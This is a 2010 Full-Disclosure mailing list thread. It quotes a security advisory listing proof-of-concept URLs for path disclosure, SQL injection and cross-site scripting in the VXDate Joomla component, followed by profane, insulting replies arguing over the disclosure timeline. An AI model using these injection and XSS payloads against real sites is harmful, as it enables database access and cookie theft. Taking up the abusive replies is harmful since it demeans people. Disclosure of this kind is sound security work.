Yup ur fucking right, as mustdie. 2 cockmunch for the price of one.
Nice. On Mon, Mar 22, 2010 at 8:36 AM, Anders Klixbull <[email protected]> wrote: > lol look who's talking about being professional > yeah sure because klixbull is such a russian name right? > and oh yeah my email address also ends in .ua > julian its time to stop gobbling that cock and shut the fuck up > > > > ------------------------------ > *From:* [email protected] [mailto: > [email protected]] *On Behalf Of *julian steward > *Sent:* 22. marts 2010 13:34 > *To:* [email protected] >> fdisclo > > *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla > > Sucking lemon hurts, I don't see why I would suck one Mr Klixbull > > Regarding his disclosure, then he shall stfu about the timeline if he wanna > be "professional". > > Yup Klixbull it's time to close your basement door and your mounth, or are > you too from .ua btw ? > > >> >> >> >> >> On Mon, Mar 22, 2010 at 7:41 AM, Anders Klixbull <[email protected]> wrote: >> >>> bohooo stop crying >>> he can disclose bugs when he feels like it >>> if you dont like that then go suck a lemon >>> >>> >>> >>> ------------------------------ >>> *From:* [email protected] [mailto: >>> [email protected]] *On Behalf Of *julian steward >>> *Sent:* 22. marts 2010 00:16 >>> *To:* MustLive; [email protected] >>> *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla >>> >>> 7 month to inform the dev's, what kind of asshole are you ? >>> >>> Oh wait, were you hacking some n00bs website, with your shitty dork ? >>> >>> 2010/3/17 MustLive <[email protected]> >>> >>>> Hello Full-Disclosure! >>>> >>>> I want to warn you about vulnerabilities in component VXDate for Joomla. >>>> >>>> ----------------------------- >>>> Advisory: Vulnerabilities in VXDate for Joomla >>>> ----------------------------- >>>> URL: http://websecurity.com.ua/3849/ >>>> ----------------------------- >>>> Timeline: >>>> >>>> 10.05.2009 - found the vulnerabilities. >>>> 12.01.2010 - announced at my site. >>>> 18.01.2010 - informed developers. >>>> 13.03.2010 - disclosed at my site. >>>> ----------------------------- >>>> Details: >>>> >>>> These are Full path disclosure, SQL Injection and Cross-Site Scripting >>>> vulnerabilities. >>>> >>>> Full path disclosure: >>>> >>>> http://site/index.php?option=com_vxdate&ct=’ >>>> >>>> http://site/index.php?option=com_vxdate&ct=1&md=details&id=’ >>>> >>>> http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’ >>>> >>>> SQL Injection: >>>> >>>> >>>> http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5 >>>> >>>> >>>> http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5 >>>> >>>> XSS: >>>> >>>> >>>> http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E >>>> >>>> >>>> http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E >>>> >>>> Vulnerable are potentially all versions of VXDate. >>>> >>>> Best wishes & regards, >>>> MustLive >>>> Administrator of Websecurity web site >>>> http://websecurity.com.ua >>>> >>>> _______________________________________________ >>>> Full-Disclosure - We believe in it. >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >>> >>> >> >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
